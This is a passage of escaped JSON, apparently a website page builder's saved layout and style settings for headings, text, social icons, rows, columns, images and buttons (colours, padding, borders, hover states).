",\"182-c169\"]},{\"id\":632,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c151\",\"182-c163\",\"182-c170\"]},{\"id\":633,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c152\",\"182-c164\",\"182-c171\"]},{\"id\":634,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"props\":{\"colorType\":\"custom\"},\"nodes\":[\"182-c172\"]},{\"id\":635,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c165\"]},{\"id\":636,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c153\"]},{\"id\":637,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c201\"]},{\"id\":638,\"props\":{\"layout\":{\"equalWidth\":false},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c202\"]},{\"id\":639,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c203\"]},{\"id\":640,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c204\"]},{\"id\":641,\"type\":\"hop-text\",\"props\":{\"type\":\"lead\"},\"v\":\"1.1\",\"nodes\":[\"182-c135\"]},{\"id\":642,\"type\":\"hop-content\",\"nodeId\":\"453-c1\",\"nodes\":[\"453-c1\"],\"v\":\"1.1\"},{\"id\":656,\"type\":\"hop-section\",\"props\":{\"showHeader\":false},\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"v\":\"1.1\",\"nodes\":[\"453-c11\"]},{\"id\":657,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":1,\"horizontalGap\":2,\"verticalGap\":2,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"453-c12\"]},{\"id\":658,\"type\":\"hop-column\",\"props\":{\"layout\":{\"verticalInnerGap\":2,\"horizontalInnerGap\":2,\"vSpace\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"v\":\"1.1\",\"nodes\":[\"453-c13\"]},{\"id\":659,\"type\":\"hop-icon\",\"style\":{\"descendants\":{\"icon\":{\"fill\":\"rgb(3, 169, 244)\",\"width\":{\"path\":\"value\",\"value\":\"24\"},\"height\":{\"path\":\"value\",\"value\":\"24\"}}}},\"v\":\"1.1\",\"nodes\":[\"453-c14\"]},{\"id\":660,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"453-c15\"]},{\"id\":661,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}},\"textAlign\":\"center\"},\"v\":\"1.1\",\"nodes\":[\"453-c16\"]},{\"id\":662,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"453-c17\"]},{\"id\":663,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"453-c18\"]},{\"id\":668,\"type\":\"hop-section\",\"props\":{\"showHeader\":false,\"width\":\"full-width\"},\"v\":\"1.1\",\"nodes\":[\"453-c2\"],\"style\":{\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":362.2734375},\"type\":\"fit-to-content\"}}},{\"id\":669,\"props\":{\"layout\":{\"equalWidth\":true,\"verticalGap\":1,\"horizontalGap\":1,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"453-c3\"]},{\"id\":670,\"type\":\"hop-column\",\"props\":{\"layout\":{\"verticalInnerGap\":0,\"horizontalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"453-c4\"]},{\"id\":671,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":0}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"453-c5\"]},{\"id\":672,\"type\":\"hop-column\",\"props\":{\"layout\":{\"verticalInnerGap\":0,\"horizontalInnerGap\":0},\"verticalAlign\":\"center\",\"media\":{\"mobile\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"20\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}}},\"v\":\"1.1\",\"nodes\":[\"453-c6\"],\"style\":{\"textAlign\":\"center\"}},{\"id\":673,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"border\":{\"top\":{\"radius\":{\"right\":{\"path\":\"value\",\"value\":300},\"left\":{\"path\":\"value\",\"value\":300}},\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}},\"bottom\":{\"radius\":{\"right\":{\"path\":\"value\",\"value\":300},\"left\":{\"path\":\"value\",\"value\":300}},\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}},\"left\":{\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}},\"right\":{\"style\":\"solid\",\"color\":\"${theme.colors.0}\",\"width\":{\"path\":\"value\",\"value\":\"2\"}}},\"width\":{\"path\":\"value\",\"value\":\"50\"},\"height\":{\"path\":\"value\",\"value\":\"50\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"background\":{\"image\":[{\"source\":{\"gradient\":{\"steps\":[{\"color\":\"rgb(0, 198, 251)\",\"position\":0},{\"color\":\"rgb(0, 91, 234)\"}],\"angle\":\"0\"}}}]},\"fill\":\"${theme.colors.4}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\",\"unit\":\"px\"}}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"453-c7\"]},{\"id\":674,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"props\":{\"verticalAlign\":\"start\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"453-c8\"]},{\"id\":675,\"type\":\"hop-heading\",\"style\":{\"color\":\"${theme.colors.1}\",\"typography\":{\"color\":\"rgb(32, 42, 84)\"}},\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"453-c9\"]},{\"id\":676,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"color\":\"rgb(64, 85, 169)\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}},\"v\":\"1.1\",\"nodes\":[\"453-c10\"]},{\"id\":677,\"type\":\"hop-button-group\",\"nodeId\":\"22-h37\",\"nodes\":[\"22-h29\"],\"v\":\"1.1\"},{\"id\":678,\"type\":\"hop-button\",\"nodeId\":\"22-h38\",\"nodes\":[\"22-h30\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":false}},\"props\":{\"buttonSize\":\"medium\",\"buttonWidth\":\"fitToContent\"}},{\"id\":679,\"type\":\"hop-button\",\"nodeId\":\"22-h39\",\"nodes\":[\"22-h39\"],\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":680,\"type\":\"hop-section\",\"nodeId\":\"182-c212\",\"nodes\":[\"182-c219\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":681,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c213\",\"nodes\":[\"182-c220\"],\"v\":\"1.1\"},{\"id\":683,\"type\":\"hop-column\",\"nodeId\":\"182-c215\",\"nodes\":[\"182-c221\"],\"v\":\"1.1\"},{\"id\":684,\"type\":\"hop-heading\",\"nodeId\":\"182-c216\",\"nodes\":[\"182-c222\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"2\"}},{\"id\":694,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c226\",\"nodes\":[\"182-c223\"],\"v\":\"1.1\"},{\"id\":695,\"type\":\"hop-column\",\"nodeId\":\"182-c227\",\"nodes\":[\"182-c217\"],\"v\":\"1.1\"},{\"id\":696,\"type\":\"hop-column\",\"nodeId\":\"182-c228\",\"nodes\":[\"182-c220\"],\"v\":\"1.1\"},{\"id\":697,\"type\":\"hop-column\",\"nodeId\":\"182-c229\",\"nodes\":[\"182-c221\"],\"v\":\"1.1\"},{\"id\":698,\"type\":\"hop-column\",\"nodeId\":\"182-c230\",\"nodes\":[\"182-c222\"],\"v\":\"1.1\"},{\"id\":699,\"type\":\"hop-heading\",\"nodeId\":\"182-c231\",\"nodes\":[\"182-c219\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\"},\"props\":{\"headerType\":\"4\"}},{\"id\":700,\"type\":\"hop-image\",\"nodeId\":\"182-c232\",\"nodes\":[\"182-c218\"],\"v\":\"1.1\"},{\"id\":701,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c223\",\"nodes\":[\"182-c223\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":702,\"type\":\"hop-column\",\"nodeId\":\"182-c224\",\"nodes\":[\"182-c224\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":703,\"type\":\"hop-column\",\"nodeId\":\"182-c225\",\"nodes\":[\"182-c225\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":704,\"type\":\"hop-heading\",\"nodeId\":\"182-c226\",\"nodes\":[\"182-c226\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"headerType\":\"4\"}},{\"id\":707,\"type\":\"hop-image\",\"nodeId\":\"182-c229\",\"nodes\":[\"182-c229\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":709,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}},\"backgroundColor\":\"${theme.colors.3|variant3}\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"182-c230\"]},{\"id\":710,\"type\":\"hop-text\",\"nodeId\":\"182-c231\",\"nodes\":[\"182-c231\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[],\"desktop\":[]}}},{\"id\":711,\"type\":\"hop-column\",\"nodeId\":\"182-c230\",\"nodes\":[\"182-c230\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":740,\"type\":\"hop-column\",\"nodeId\":\"182-c283\",\"nodes\":[\"182-c130\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":745,\"type\":\"hop-image\",\"nodeId\":\"182-c287\",\"nodes\":[\"182-c131\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"style\":\"none\"},\"left\":{\"style\":\"none\"}},\"boxShadow\":{\"enabled\":false}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"style\":\"none\"},\"left\":{\"style\":\"none\"}}},\"frameImage\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}}}}}}}},{\"id\":746,\"type\":\"hop-heading\",\"nodeId\":\"182-c288\",\"nodes\":[\"182-c132\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":747,\"type\":\"hop-text\",\"nodeId\":\"182-c289\",\"nodes\":[\"182-c133\"],\"v\":\"1.1\"},{\"id\":749,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\"}},\"textAlign\":\"center\"},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c134\"]},{\"id\":750,\"type\":\"hop-column\",\"nodeId\":\"182-c291\",\"nodes\":[\"182-c112\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":751,\"type\":\"hop-column\",\"nodeId\":\"182-c292\",\"nodes\":[\"182-c107\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":752,\"type\":\"hop-image\",\"nodeId\":\"182-c293\",\"nodes\":[\"182-c113\"],\"v\":\"1.1\"},{\"id\":753,\"type\":\"hop-heading\",\"nodeId\":\"182-c294\",\"nodes\":[\"182-c114\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":754,\"type\":\"hop-text\",\"nodeId\":\"182-c295\",\"nodes\":[\"182-c115\"],\"v\":\"1.1\"},{\"id\":755,\"type\":\"hop-image\",\"nodeId\":\"182-c296\",\"nodes\":[\"182-c108\"],\"v\":\"1.1\"},{\"id\":756,\"type\":\"hop-heading\",\"nodeId\":\"182-c297\",\"nodes\":[\"182-c109\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":757,\"type\":\"hop-text\",\"nodeId\":\"182-c298\",\"nodes\":[\"182-c110\"],\"v\":\"1.1\"},{\"id\":759,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 